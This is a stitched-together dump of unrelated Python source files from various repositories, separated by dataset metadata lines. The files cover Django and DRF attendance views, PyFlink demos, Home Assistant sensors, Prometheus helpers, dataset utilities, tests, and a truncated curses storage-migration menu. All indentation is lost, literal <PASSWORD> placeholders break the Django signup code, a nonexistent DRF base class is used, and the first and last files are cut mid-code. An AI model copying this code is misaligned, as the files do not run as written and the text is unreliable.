# unnecessary. This is mostly to help the user see whether a lock
# exists by examining the filesystem.
try:
os.unlink(self._path)
except:
pass
''' USAGE
with SimpleFlock("locktest", 2): ## "locktest" is a temporary file that tells whether the lock is active
## perform action on the locked file(s)
## file is locked when with starts until its left
## if file is locked, code is paused until lock is released, then with is performed
'''
def first(iterable, condition = lambda x: True):
"""
Returns the first item in the `iterable` that satisfies the `condition`.
If the condition is not given, returns the first item of the iterable.
Returns -1 if no item satysfing the condition is found.
>>> first( (1,2,3), condition=lambda x: x % 2 == 0)
2
>>> first(range(3, 100))
3
>>> first( (1,2,3), condition=lambda x: x > 9)
-1
THANKS TO Caridorc
https://stackoverflow.com/questions/2361426/get-the-first-item-from-an-iterable-that-matches-a-condition
"""
try:
return next(x for x in iterable if condition(x))
except:
return -1
## wrapper to show time needed for some function
'''
def HowLong( f, *args, print_additional='', **kwargs ):
""" wrapper to print the time needed to call function f """
t0 = time()
ret = f( *args, **kwargs )
t = time() - t0
print( "Running %s took %i minutes and %.1f seconds %s" % (f.__name__, t//60, t%60, print_additional ) )
return ret
'''
| 2.53125 | 3 |
tests/test_well_mapper.py | GallowayLabMIT/rushd | 0 | 12794274 | <reponame>GallowayLabMIT/rushd
import pytest
from rushd.well_mapper import well_mapping
def test_default_separator():
"""
Tests that the default separator is a period,
and that conditions are properly merged together.
"""
result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}])
print(result)
assert result['A01'] == 'foo.bar'
def test_custom_separator():
"""
Tests that we can override the mapping separator.
"""
for sep in r'!@#$%^&*()<>,\/':
result = well_mapping([{'foo': 'A1'}, {'bar': 'A1'}], separator=sep)
assert result['A01'] == f'foo{sep}bar'
def test_valid_mapping_spec():
"""
Tests valid specifications do not throw an error
"""
_ = well_mapping(
{
'a': 'A01',
'b': 'A1',
'c': 'A2,', # allow trailing commas
'd': 'A1-B12',
'e': 'A1-B12,C5,C4-F8',
'f': 'A1-B12, C12, D4', # allow whitespace
}
)
assert True
def test_invalid_mapping_spec():
"""
Tests that invalid specifications throw errors
"""
with pytest.raises(ValueError):
_ = well_mapping({'a': ''})
with pytest.raises(ValueError):
_ = well_mapping({'a': 'Z99'})
with pytest.raises(ValueError):
_ = well_mapping({'a': 'A1:A15'})
def test_backwards_rectangles():
"""
Tests that arbitrary rectangles
are allowed (even those that are not
upper-left corner to bottom-right)
"""
result = well_mapping([{'foo': 'F8-C4'}])
for key in ['C4', 'C8', 'F4', 'F8', 'D6']:
assert result[key] == 'foo'
def test_normed_and_unnormed_single_well():
"""
Tests that normalized and un-normalized well-IDs
are handled for looking up a single well entry.
"""
result = well_mapping([{'foo': 'A1'}, {'bar': 'A10'}, {'baz': 'A1,A10'}])
assert result['A1'] == 'foo.baz'
assert result['A01'] == 'foo.baz'
assert result['A10'] == 'bar.baz'
def test_normed_and_unnormed_rectangle():
"""
Tests that normalized and un-normalized well-IDs
are handled for looking up a rectangular mapping entry.
"""
result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1-A10'}])
assert result['A1'] == 'foo.baz'
assert result['A01'] == 'foo.baz'
assert result['A10'] == 'bar.baz'
def test_normed_and_unnormed_mix():
"""
Tests that normalized and un-normalized well-IDs
are handled for looking up a mix of mapping entries.
"""
result = well_mapping([{'foo': 'A1-A5'}, {'bar': 'A6-A10'}, {'baz': 'A1,A10'}])
assert result['A1'] == 'foo.baz'
assert result['A01'] == 'foo.baz'
assert result['A10'] == 'bar.baz'
def test_normed_unnormed_input():
"""
Tests that normalized and unnormalized input well mappings work.
"""
result = well_mapping(
[{'foo': 'A1-G9'}, {'bar': 'A01-G09'}, {'baz': 'A1-G09'}, {'qaz': 'A01-G9'}]
)
for i in range(1, 10):
assert result[f'A{i}'] == 'foo.bar.baz.qaz'
assert result[f'A{i:02d}'] == 'foo.bar.baz.qaz'
| 2.859375 | 3 |
bigdata_study/pyflink1.x/batch/demo01.py | kingreatwill/penter | 13 | 12794275 | import logging
import os
import shutil
import sys
import tempfile
from pyflink.dataset import ExecutionEnvironment
from pyflink.table import BatchTableEnvironment, TableConfig, DataTypes
from pyflink.table import expressions as expr
from pyflink.table.descriptors import OldCsv, FileSystem, Schema
from pyflink.table.expressions import lit
def demo01():
exec_env = ExecutionEnvironment.get_execution_environment()
exec_env.set_parallelism(1)
t_config = TableConfig()
t_env = BatchTableEnvironment.create(exec_env, t_config)
# StreamExecutionEnvironment
t_env.connect(FileSystem().path(r'F:\github\openjw\penter\bigdata_study\pyflink1.x\batch\demo01\input')) \
.with_format(OldCsv()
.field('word', DataTypes.STRING())) \
.with_schema(Schema()
.field('word', DataTypes.STRING())) \
.create_temporary_table('mySource')
# 文件存在会报错
t_env.connect(FileSystem().path(r'F:\github\openjw\penter\bigdata_study\pyflink1.x\batch\demo01\output')) \
.with_format(OldCsv()
.field_delimiter('\t')
.field('word', DataTypes.STRING())
.field('count', DataTypes.BIGINT())) \
.with_schema(Schema()
.field('word', DataTypes.STRING())
.field('count', DataTypes.BIGINT())) \
.create_temporary_table('mySink')
tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
.select(tab.word, lit(1).count) \
.execute_insert('mySink').wait()
def demo02():
exec_env = ExecutionEnvironment.get_execution_environment()
exec_env.set_parallelism(1)
t_config = TableConfig()
t_env = BatchTableEnvironment.create(exec_env, t_config)
# StreamExecutionEnvironment
my_source_ddl = """
create table mySource (
word VARCHAR
) with (
'connector' = 'filesystem',
'format.type' = 'csv',
'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/input'
)
"""
my_sink_ddl = """
create table mySink (
word VARCHAR,
`count` BIGINT
) with (
'connector' = 'filesystem',
'format.type' = 'csv',
'connector.path' = 'F:/github/openjw/penter/bigdata_study/pyflink1.x/batch/demo01/output'
)
"""
t_env.execute_sql(my_source_ddl)
t_env.execute_sql(my_sink_ddl)
tab = t_env.from_path('mySource')
tab.group_by(tab.word) \
.select(tab.word, lit(1).count) \
.execute_insert('mySink').wait()
if __name__ == '__main__':
# demo01()
demo02() # 跑不起来
| 2.140625 | 2 |
agent0/nips_encoder/run.py | zhoubin-me/agent0 | 0 | 12794276 | import git
import ray
from ray import tune
from ray.tune import CLIReporter
from agent0.common.utils import parse_arguments
from agent0.nips_encoder.trainer import Trainer, Config
if __name__ == '__main__':
repo = git.Repo(search_parent_directories=True)
sha = repo.git.rev_parse(repo.head.object.hexsha, short=True)
sha_long = repo.head.object.hexsha
cfg = Config(sha=sha_long)
args = parse_arguments(cfg)
cfg = Config(**vars(args))
ray.init(memory=20 * 2 ** 30, object_store_memory=80 * 2 ** 30)
reporter = CLIReporter(
metric_columns=["game", "speed", "loss", "adam_lr", "time_remain", "time_past"]
)
analysis = tune.run(
Trainer,
name='nips_encoder_tune',
verbose=1,
stop=lambda trial_id, result: result['epoch'] > cfg.epochs,
checkpoint_at_end=True,
progress_reporter=reporter,
checkpoint_freq=cfg.replay_size // cfg.batch_size,
resources_per_trial={"gpu": 1},
config=vars(cfg),
fail_fast=True,
reuse_actors=True,
restore=cfg.restore_checkpoint,
)
| 1.882813 | 2 |
src/dagos/core/environments/environment_domain.py | DAG-OS/dagos | 0 | 12794277 | from __future__ import annotations
import typing as t
from dataclasses import dataclass
from pathlib import Path
from loguru import logger
from rich.console import Console
from rich.console import ConsoleOptions
from rich.console import Group
from rich.console import group
from rich.console import RenderResult
from rich.markdown import Markdown
from rich.panel import Panel
from rich.table import Table
from rich.tree import Tree
from dagos.core.components import SoftwareComponent
class SoftwareEnvironmentRegistry(type):
"""A metaclass responsible for registering software environments."""
environments: t.List[SoftwareEnvironment] = []
def __call__(cls, *args: t.Any, **kwds: t.Any) -> t.Any:
"""The registry hooks into the object construction lifecycle to register
software environments.
"""
environment = super().__call__(*args, **kwds)
if cls not in cls.environments:
cls.environments.append(environment)
return environment
@classmethod
def find_environment(cls, name: str) -> t.Optional[SoftwareEnvironment]:
for environment in cls.environments:
if environment.name == name:
return environment
return None
@dataclass
class Platform:
env: t.List[EnvironmentVariable]
packages: t.List[Packages]
images: t.List[Image]
def __rich_console__(
self, console: Console, options: ConsoleOptions
) -> t.Generator[RenderResult]:
parent_table = Table(box=None)
parent_table.add_column()
parent_table.add_column()
common_package_table = Table(title="Common Packages", show_header=False)
common_package_table.add_column("")
common_package_tree = Tree("packages")
for packages in self.packages:
common_package_tree.add(packages.__rich__())
common_package_table.add_row(common_package_tree)
image_table = Table(title=f"Targeted Container Images ({len(self.images)})")
image_table.add_column("ID")
image_table.add_column("Packages")
for image in self.images:
package_tree = Tree("packages")
for packages in image.packages:
package_tree.add(packages.__rich__())
image_table.add_row(image.id, package_tree)
parent_table.add_row(common_package_table, image_table)
yield parent_table
@dataclass
class EnvironmentVariable:
name: str
value: str
@dataclass
class Packages:
package_list: t.List[str]
manager: str = "system"
dependency: t.Optional[str] = None
def __rich__(self) -> Tree:
title = (
self.manager
if self.dependency is None
else f"{self.manager} ({self.dependency})"
)
tree = Tree(title)
for package in self.package_list:
tree.add(package)
return tree
@dataclass
class Image:
id: str
packages: t.List[Packages]
@dataclass
class Component:
name: str
purpose: t.Optional[str]
version: t.Optional[str]
software_component: t.Optional[SoftwareComponent]
class SoftwareEnvironment(metaclass=SoftwareEnvironmentRegistry):
"""Base class for software environments."""
path: Path
name: str
description: t.Optional[str]
platform: Platform
components: t.List[Component]
def __init__(
self,
path: Path,
name: str,
description: t.Optional[str],
platform: Platform,
components: t.List[Component],
) -> None:
""""""
self.path = path
self.name = name
self.description = description
self.platform = platform
self.components = components
def collect_components(self) -> t.List[SoftwareComponent]:
collected_components: t.List[SoftwareComponent] = []
unknown_components: t.List[str] = []
for component in self.components:
if component.software_component:
logger.trace("Requested component '{}' is known!", component.name)
# TODO: Check if selected platform supports component?
collected_components.append(component.software_component)
else:
unknown_components.append(component.name)
if len(unknown_components) > 0:
logger.error(
"{} of the {} requested components are unknown, specifically: {}",
len(unknown_components),
len(self.components),
", ".join(unknown_components),
)
return collected_components
def __rich__(self) -> Panel:
@group()
def get_renderables():
yield Markdown(f"{self.description}\n")
yield self.platform
table = Table(
title=f"Software Components ({len(self.components)})",
title_justify="left",
show_lines=True,
expand=True,
)
table.add_column("Name")
table.add_column("Purpose", ratio=1)
table.add_column("Version", justify="right")
table.add_column("Found?", justify="center")
table.add_column("Valid?", justify="center")
for component in self.components:
table.add_row(
component.name,
component.purpose,
component.version,
":white_check_mark:"
if component.software_component
else ":cross_mark:",
":white_check_mark:"
if component.software_component.is_valid()
else ":cross_mark:",
)
yield table
return Panel(
Group(get_renderables()),
title=f"Environment: {self.name}",
title_align="left",
subtitle=f"Path: {self.path}",
subtitle_align="right",
)
| 2.21875 | 2 |
Attendance/views.py | MadhuraShanbhag/DRF-Attendance-Web | 0 | 12794278 | <gh_stars>0
from django.shortcuts import render, redirect
from django.urls import reverse_lazy
from . import forms
from django.views.generic import TemplateView
from django.contrib.auth import logout, authenticate, login
from django.contrib.auth.decorators import login_required
from rest_framework import generics
from .models import Teacher, Student, Lecture, Div, Subject
from .serializers import TeacherSerializer, StudentSerializer, LectureSerializer, DivSerializer, SubjectSerializer
class HomePage(TemplateView):
template_name = 'Attendance/index.html'
class TestPage(TemplateView):
template_name = 'Attendance/login_success.html'
class ThanksPage(TemplateView):
template_name = 'Attendance/logout_success.html'
def login_user_teacher(request):
# logout(request)
# username = password = ''
if request.POST:
username = request.POST['username']
password = request.POST['password']
user = authenticate(username=username, password=password)
if user is not None:
if user.is_active:
login(request, user)
return redirect('Attendance:dash')
return render(request, 'Attendance/login.html', context={'form': forms.TeacherLoginForm()})
@login_required
def dash(request):
return render(request, 'Attendance/login_success.html')
def signup(request):
if request.method == 'POST':
form = forms.UserCreateForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
raw_password = form.cleaned_data.get('<PASSWORD>')
user = authenticate(username=username, password=<PASSWORD>)
login(request, user)
return redirect('Attendance:dash')
else:
form = forms.UserCreateForm()
return render(request, 'Attendance/signup.html', {'form': form})
######################### REST FRAMEWORK RELATED API VIEWS ##########################
class TeacherListView(generics.ListCreateAPIView):
queryset = Teacher.objects.all()
serializer_class= TeacherSerializer
class TeacherDetailView(generics.RetrieveUpdateDeleteAPIView):
serializer_class= TeacherSerializer
def get_queryset(self):
return Teacher.objects.all().filter(username=self.request.user)
class StudentListView(generics.ListCreateAPIView):
queryset = Student.objects.all()
serializer_class= StudentSerializer
class StudentDetailView(generics.RetrieveUpdateDeleteAPIView):
serializer_class= StudentSerializer
def get_queryset(self):
return Student.objects.all().filter(username=self.request.user)
class LectureListView(generics.ListCreateAPIView):
queryset = Lecture.objects.all()
serializer_class= LectureSerializer
def perform_create(self, serializer):
serializer.save(user=self.request.user)
class LectureDetailView(generics.RetrieveUpdateDeleteAPIView):
serializer_class= LectureSerializer
def get_queryset(self):
return Lecture.objects.all().filter(user=self.request.user)
class SubjectListView(generics.ListCreateAPIView):
queryset = Subject.objects.all()
serializer_class= SubjectSerializer
class SubjectDetailView(generics.RetrieveUpdateDeleteAPIView):
serializer_class= SubjectSerializer
def get_queryset(self):
return Subject.objects.all().filter(user=self.request.user)
class DivisionListView(generics.ListCreateAPIView):
queryset = Div.objects.all()
serializer_class= DivSerializer
class DivisionDetailView(generics.RetrieveUpdateDeleteAPIView):
serializer_class= DivSerializer
def get_queryset(self):
return Div.objects.all().filter(user=self.request.user)
| 2.078125 | 2 |
Chapter05/myunittest/tests/tests_mycalc/test_mycalc_add.py | MichaelRW/Python-for-Geeks | 31 | 12794279 | <filename>Chapter05/myunittest/tests/tests_mycalc/test_mycalc_add.py
# test_mycalc_add.py test suite for add class method
import unittest
from myunittest.src.mycalc.mycalc import MyCalc
class MyCalcAddTestSuite(unittest.TestCase):
def setUp(self):
self.calc = MyCalc()
def test_add(self):
""" test case to validate two positive numbers"""
self.assertEqual(15, self.calc.add(10, 5), "should be 15")
if __name__ == '__main__':
unittest.main()
| 3.203125 | 3 |
src/utils/sunrgbd.py | acaglayan/CNN_randRNN | 8 | 12794280 | <filename>src/utils/sunrgbd.py<gh_stars>1-10
import os
import numpy as np
from basic_utils import DataTypesSUNRGBD
class_id_to_name = {
"0": "bathroom",
"1": "bedroom",
"2": "classroom",
"3": "computer_room",
"4": "conference_room",
"5": "corridor",
"6": "dining_area",
"7": "dining_room",
"8": "discussion_area",
"9": "furniture_store",
"10": "home_office",
"11": "kitchen",
"12": "lab",
"13": "lecture_theatre",
"14": "library",
"15": "living_room",
"16": "office",
"17": "rest_space",
"18": "study_space"
}
class_name_to_id = {v: k for k, v in class_id_to_name.items()}
class_names = set(class_id_to_name.values())
def get_class_ids(names):
ids = []
for name in names:
_id = class_name_to_id[name]
ids.append(_id)
return np.asarray(ids, dtype=np.int)
def get_class_names(ids):
names = []
for _id in ids:
_name = class_id_to_name[str(_id)]
names.append(_name)
return np.asarray(names)
def _is_category_available(cat_name):
for cat in class_names:
if cat == cat_name:
return True
return False
def load_props(params, path, split):
start_ind = path.find('SUNRGBD') + 7
end_ind = path.rfind('\\') - 1
rel_seq_path = path[start_ind:end_ind]
data_path = os.path.join(params.dataset_path, 'SUNRGBD')
instance_path = data_path + rel_seq_path
label = np.loadtxt(os.path.join(instance_path, 'scene.txt'), dtype=str)
data_type = params.data_type
if data_type == DataTypesSUNRGBD.RGB:
img_dir_name = 'image/'
else:
img_dir_name = 'depth/'
img_name = os.listdir(os.path.join(instance_path, img_dir_name))[0]
path = os.path.join(instance_path, img_dir_name+img_name)
intrinsics = np.loadtxt(os.path.join(instance_path, 'intrinsics.txt'), dtype=np.float32)
extrinsics = np.loadtxt(os.path.join(
instance_path, 'extrinsics/' + os.listdir(os.path.join(instance_path, 'extrinsics/'))[0]), dtype=np.float32)
sunrgbd_image = SunRGBDImage(data_type, img_name, path, str(label), split)
sunrgbd_image.sequence_name = rel_seq_path
sunrgbd_image.intrinsics = intrinsics
sunrgbd_image.extrinsics = extrinsics
return sunrgbd_image
class SunRGBDImage:
def __init__(self, data_type, img_name, path, label, split):
self._data_type = data_type
self._path = path
self._label = label
self._img_name = img_name
self._split = split
self._sequence_name = None
self._intrinsics = None
self._extrinsics = None
self._Rtilt = None
self._K = None
@property
def data_type(self):
return self._data_type
@data_type.setter
def data_type(self, data_type):
self._data_type = data_type
@property
def path(self):
return self._path
@path.setter
def path(self, path):
self._path = path
@property
def label(self):
return self._label
@label.setter
def label(self, label):
self._label = label
@property
def img_name(self):
return self._img_name
@img_name.setter
def img_name(self, img_name):
self._img_name = img_name
@property
def split(self):
return self._split
@split.setter
def split(self, split):
self._split = split
@property
def sequence_name(self):
return self._sequence_name
@sequence_name.setter
def sequence_name(self, sequence_name):
self._sequence_name = sequence_name
@property
def intrinsics(self):
return self._intrinsics
@intrinsics.setter
def intrinsics(self, intrinsics):
self._intrinsics = intrinsics
@property
def extrinsics(self):
return self._extrinsics
@extrinsics.setter
def extrinsics(self, extrinsics):
self._extrinsics = extrinsics
@property
def Rtilt(self):
return self._Rtilt
@Rtilt.setter
def Rtilt(self, Rtilt):
self._Rtilt = Rtilt
@property
def K(self):
return self._K
@K.setter
def K(self, K):
self._K = K
def get_fullname(self):
return self.label + '__' + self.sequence_name.replace('/', '_') + '_' + self.img_name
def is_scene_challenge_category(self):
return _is_category_available(self.label)
| 2.6875 | 3 |
custom_components/luxtronik/binary_sensor.py | BenPru/luxtronik | 2 | 12794281 | <reponame>BenPru/luxtronik<gh_stars>1-10
"""Support for Luxtronik heatpump binary states."""
# region Imports
import logging
from typing import Any, Final
import homeassistant.helpers.config_validation as cv
import voluptuous as vol
from homeassistant.components.binary_sensor import (DEVICE_CLASS_LOCK,
DEVICE_CLASS_RUNNING,
PLATFORM_SCHEMA,
BinarySensorEntity)
from homeassistant.components.sensor import ENTITY_ID_FORMAT
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import (CONF_FRIENDLY_NAME, CONF_ICON, CONF_ID,
CONF_SENSORS)
from homeassistant.core import HomeAssistant
from homeassistant.helpers.entity import ENTITY_CATEGORIES, DeviceInfo
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import ConfigType
from homeassistant.helpers.restore_state import RestoreEntity
from homeassistant.util import slugify
from .const import *
from .helpers.helper import get_sensor_text
from .luxtronik_device import LuxtronikDevice
# endregion Imports
# region Constants
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_SENSORS): vol.All(
cv.ensure_list,
[
{
vol.Required(CONF_GROUP): vol.All(
cv.string,
vol.In(
[CONF_PARAMETERS, CONF_CALCULATIONS, CONF_VISIBILITIES]),
),
vol.Required(CONF_ID): cv.string,
vol.Optional(CONF_FRIENDLY_NAME): cv.string,
vol.Optional(CONF_ICON): cv.string,
vol.Optional(CONF_INVERT_STATE, default=False): cv.boolean,
}
],
)
}
)
# endregion Constants
# region Setup
async def async_setup_platform(
hass: HomeAssistant, config: ConfigType, async_add_entities: AddEntitiesCallback, discovery_info: dict[str, Any] = None,
) -> None:
"""Set up a Luxtronik binary sensor from yaml config."""
LOGGER.info(f"{DOMAIN}.binary_sensor.async_setup_platform ConfigType: %s - discovery_info: %s",
config, discovery_info)
luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)
if not luxtronik:
LOGGER.warning("binary_sensor.async_setup_platform no luxtronik!")
return False
# use_legacy_sensor_ids = hass.data[f"{DOMAIN}_{CONF_USE_LEGACY_SENSOR_IDS}"]
deviceInfo = hass.data[f"{DOMAIN}_DeviceInfo"]
deviceInfoDomesticWater = hass.data[f"{DOMAIN}_DeviceInfo_Domestic_Water"]
deviceInfoHeating = hass.data[f"{DOMAIN}_DeviceInfo_Heating"]
deviceInfoCooling = hass.data[f"{DOMAIN}_DeviceInfo_Cooling"]
sensors = config.get(CONF_SENSORS)
entities = []
if sensors:
# region Legacy part:
for sensor_cfg in sensors:
sensor_id = sensor_cfg[CONF_ID]
if '.' in sensor_id:
group = sensor_id.split('.')[0]
sensor_id = sensor_id.split('.')[1]
else:
group = sensor_cfg[CONF_GROUP]
sensor = luxtronik.get_sensor(group, sensor_id)
if sensor:
name = sensor.name if not sensor_cfg.get(
CONF_FRIENDLY_NAME) else sensor_cfg.get(CONF_FRIENDLY_NAME)
entity_id = "luxtronik.{}".format(slugify(name)) # if use_legacy_sensor_ids else None
LOGGER.info(
"binary_sensor.async_setup_platform create entity_id: '%s'", entity_id)
entities += [
LuxtronikBinarySensor(hass, luxtronik, deviceInfo=deviceInfo, sensor_key=f"{group}.{sensor_id}",
unique_id=sensor_id, name=name, icon=sensor_cfg.get(CONF_ICON), device_class=DEVICE_CLASSES.get(
sensor.measurement_type, DEFAULT_DEVICE_CLASS),
state_class=None, invert_state=sensor_cfg.get(CONF_INVERT_STATE))
]
else:
LOGGER.warning(
"Invalid Luxtronik ID %s in group %s",
sensor_id,
group,
)
# endregion Legacy part:
async_add_entities(entities)
async def async_setup_entry(
hass: HomeAssistant, config_entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up a Luxtronik sensor from ConfigEntry."""
LOGGER.info(
f"{DOMAIN}.binary_sensor.async_setup_entry ConfigType: %s", config_entry)
luxtronik: LuxtronikDevice = hass.data.get(DOMAIN)
if not luxtronik:
LOGGER.warning("binary_sensor.async_setup_entry no luxtronik!")
return False
deviceInfo = hass.data[f"{DOMAIN}_DeviceInfo"]
deviceInfoHeating = hass.data[f"{DOMAIN}_DeviceInfo_Heating"]
# Build Sensor names with local language:
lang = config_entry.options.get(CONF_LANGUAGE_SENSOR_NAMES)
text_evu_unlocked = get_sensor_text(lang, 'evu_unlocked')
entities = [
LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfo, sensor_key=LUX_BINARY_SENSOR_EVU_UNLOCKED,
unique_id='evu_unlocked', name=text_evu_unlocked, icon='mdi:lock',
device_class=DEVICE_CLASS_LOCK)
]
deviceInfoDomesticWater = hass.data[f"{DOMAIN}_DeviceInfo_Domestic_Water"]
if deviceInfoDomesticWater is not None:
text_solar_pump = get_sensor_text(lang, 'solar_pump')
entities += [
LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoDomesticWater, sensor_key=LUX_BINARY_SENSOR_SOLAR_PUMP,
unique_id='solar_pump', name=text_solar_pump, icon='mdi:pump',
device_class=DEVICE_CLASS_RUNNING)
]
deviceInfoCooling = hass.data[f"{DOMAIN}_DeviceInfo_Cooling"]
if deviceInfoCooling is not None:
text_approval_cooling = get_sensor_text(lang, 'approval_cooling')
entities += [
LuxtronikBinarySensor(hass=hass, luxtronik=luxtronik, deviceInfo=deviceInfoCooling, sensor_key='calculations.ID_WEB_FreigabKuehl',
unique_id='approval_cooling', name=text_approval_cooling, icon='mdi:lock',
device_class=DEVICE_CLASS_LOCK)
]
async_add_entities(entities)
# endregion Setup
class LuxtronikBinarySensor(BinarySensorEntity, RestoreEntity):
"""Representation of a Luxtronik binary sensor."""
def __init__(
self,
hass: HomeAssistant,
luxtronik: LuxtronikDevice,
deviceInfo: DeviceInfo,
sensor_key: str,
unique_id: str,
name: str,
icon: str,
device_class: str,
state_class: str = None,
entity_category: ENTITY_CATEGORIES = None,
invert_state: bool = False
) -> None:
"""Initialize a new Luxtronik binary sensor."""
self.hass = hass
self._luxtronik = luxtronik
self._sensor_key = sensor_key
self.entity_id = ENTITY_ID_FORMAT.format(f"{DOMAIN}_{unique_id}")
self._attr_unique_id = self.entity_id
self._attr_device_info = deviceInfo
self._attr_name = name
self._attr_icon = icon
self._attr_device_class = device_class
self._attr_state_class = state_class
self._attr_entity_category = entity_category
self._invert = invert_state
@property
def is_on(self):
"""Return true if binary sensor is on."""
value = self._luxtronik.get_value(self._sensor_key)
return not value if self._invert else value
def update(self):
"""Get the latest status and use it to update our sensor state."""
self._luxtronik.update()
| 1.679688 | 2 |
iNaturalist_stats.py | noameshed/novelty-detection | 29 | 12794282 | <filename>iNaturalist_stats.py<gh_stars>10-100
# explore data statistics
import numpy as np
import os
import seaborn as sns
import matplotlib.pyplot as plt
f = 'D:/noam_/Cornell/CS7999/iNaturalist/train_val_images/'
grp_names = []
grp_count = []
grp_min = np.inf
min_folder = ''
grp_max = 0
max_folder = ''
avg_folder = 0
counter = 0
for i, bio_grp in enumerate(os.listdir(f)):
class_path = f + bio_grp + '/'
grp_count.append(0)
for clss in os.listdir(class_path):
pics = len(os.listdir(class_path + clss + '/'))
if pics > grp_max:
grp_max = pics
max_folder = clss
if pics < grp_min:
grp_min = pics
min_folder = clss
avg_folder += pics
grp_count[i] += pics
counter += 1
grp_names.append(bio_grp)
avg_folder/=counter
print('smallest folder (%s) has %d images' %(min_folder, grp_min))
print('biggest folder (%s) has %d images' %(max_folder, grp_max))
print('average folder size is %d' %(round(avg_folder)))
'''
Results printed:
smallest folder (Datana ministra) has 14 images
biggest folder (Danaus plexippus) has 3949 images
average folder size is 133
'''
# Plot number of images per class
ax = sns.barplot(grp_names, grp_count)
ax.set_title('Distribution of Images by Biological Group')
ax.set_xlabel('Biological Group')
ax.set_ylabel('Number of images')
for p in ax.patches:
ax.annotate("%d" % p.get_height(), (p.get_x() + p.get_width() / 2., p.get_height()),
ha='center', va='center', fontsize=8, color='black', xytext=(0, 4),
textcoords='offset points')
plt.show()
| 3.015625 | 3 |
metREx/app/main/util/prometheus_helper.py | vijayragava/metREx | 8 | 12794283 | <filename>metREx/app/main/util/prometheus_helper.py<gh_stars>1-10
import os
import re
from prometheus_client.core import CollectorRegistry
from prometheus_client.multiprocess import MultiProcessCollector
collector_registries = {}
prometheus_multiproc_dir = os.getenv('prometheus_multiproc_dir')
def get_pushgateways(aa, apialchemy_info):
pushgateways = {}
apialchemy_prefix, apialchemy_binds = apialchemy_info
service_name_pattern = re.compile(r'^' + r'(?:' + re.escape(apialchemy_prefix) + r')(?P<name>.+)$', re.X)
api_vendor_pattern = re.compile(r'^(?:(?P<vendor>\w+)(?:\+(?:http|https))?)(?=://)', re.X)
pushgateway_services = list(filter(None, re.split(r'\s*,\s*', os.getenv('PUSHGATEWAY_SERVICES', ''))))
for service in pushgateway_services:
m = service_name_pattern.match(service)
if m is not None:
components = m.groupdict()
service_name = components['name']
if service_name in apialchemy_binds.keys():
conn_str = apialchemy_binds[service_name]
m = api_vendor_pattern.match(conn_str)
if m is not None:
components = m.groupdict()
if components['vendor'] == 'pushgateway':
from ..api.pushgateway import Pushgateway
dal = Pushgateway(aa)
dal.init_aa(service_name)
pushgateways[service] = dal.client
else:
raise ValueError("Service '" + service + "' is not a valid Pushgateway.")
else:
raise ValueError("Service '" + service + "' not found.")
return pushgateways
def get_registry(name):
if name not in collector_registries.keys():
collector_registries[name] = CollectorRegistry()
if prometheus_multiproc_dir is not None:
MultiProcessCollector(collector_registries[name])
return collector_registries[name]
def register_collector(name, collector):
job_registry = get_registry(name)
job_registry.register(collector)
def unregister_collector(name, collector):
if name in collector_registries.keys():
collector_registries[name].unregister(collector)
del collector_registries[name]
| 2.1875 | 2 |
devpay/__init__.py | DevpayInc/devpay-python-sdk | 0 | 12794284 | <reponame>DevpayInc/devpay-python-sdk<filename>devpay/__init__.py<gh_stars>0
# Version of devpay package
__version__ = "1.0.0" | 1.046875 | 1 |
xpmig_precheck.py | kschets/XP_migrator | 1 | 12794285 | <reponame>kschets/XP_migrator<gh_stars>1-10
#!/usr/bin/python
"""
####################################################################################################
TITLE : HPE XP7 Migration, Precheck
DESCRIPTION : Precheck to examine hostgroup is ready for migration
AUTHOR : <NAME> / StorageTeam
VERSION : Based on previous ODR framework
1.0 Initial version
1.1 Curses menu structure added
1.2 Add search term criteria
1.3 Add config file
2.0 Consistency check update
2.1 Add xpinfo file processing
CONFIG : xpmig.ini
LOG : xpmig_precheck.log
TODO :
add generate temporary horcm file and daemon to pairdisplay & check on status
####################################################################################################
"""
import curses
from curses import panel
import re
import logging
import logging.handlers
import copy
from ConfigParser import ConfigParser
import sys
import os
import os.path
import csv
import string
import xp7
####################################################################################################
### VARIABLES
####################################################################################################
linelen = 100
boxpair_dict = {}
serialnbr_dict = {}
instance_dict = {}
site_dict = {}
collectfile_dict = {}
box_dict = {}
####################################################################################################
### FUNCTIONS
####################################################################################################
####################################################################################################
### CLASSES
####################################################################################################
class Menu(object):
def __init__(self,window,items,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.position = 0
self.items = items
self.items.append(("exit","exit"))
def navigate(self,n):
self.position += n
if self.position < 0:
self.position = 0
elif self.position >= len(self.items):
self.position = len(self.items) - 1
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
while True:
self.window.refresh()
curses.doupdate()
for index,item in enumerate(self.items):
if index == self.position:
mode = curses.A_STANDOUT
else:
mode = curses.A_NORMAL
# line = "{}: {}".format(index,item[0])
line = "{}".format(item[0])
if len(line) >= self.width:
line = line[:self.width-1]
self.window.addstr(1+index,2,line,mode)
key = self.window.getch()
if key in [curses.KEY_ENTER,ord("\n"),ord("B"),ord("b")]:
if self.position == len(self.items) - 1:
break
else:
self.items[self.position][1]()
elif key == curses.KEY_UP:
self.navigate(-1)
elif key == curses.KEY_DOWN:
self.navigate(1)
self.window.clear()
self.panel.hide()
panel.update_panels()
curses.doupdate()
class InputMenu(object):
def __init__(self,window,text,upd_obj,stdscr):
self.window = window
self.heigth,self.width = self.window.getmaxyx()
self.window.keypad(1)
self.panel = panel.new_panel(self.window)
self.panel.hide()
panel.update_panels()
self.text = text
self.reply = ""
self.update_object = upd_obj
def display(self):
self.panel.top()
self.panel.show()
self.window.clear()
line = "{}: ".format(self.text)
if line >= self.width:
line = line[:self.width-1]
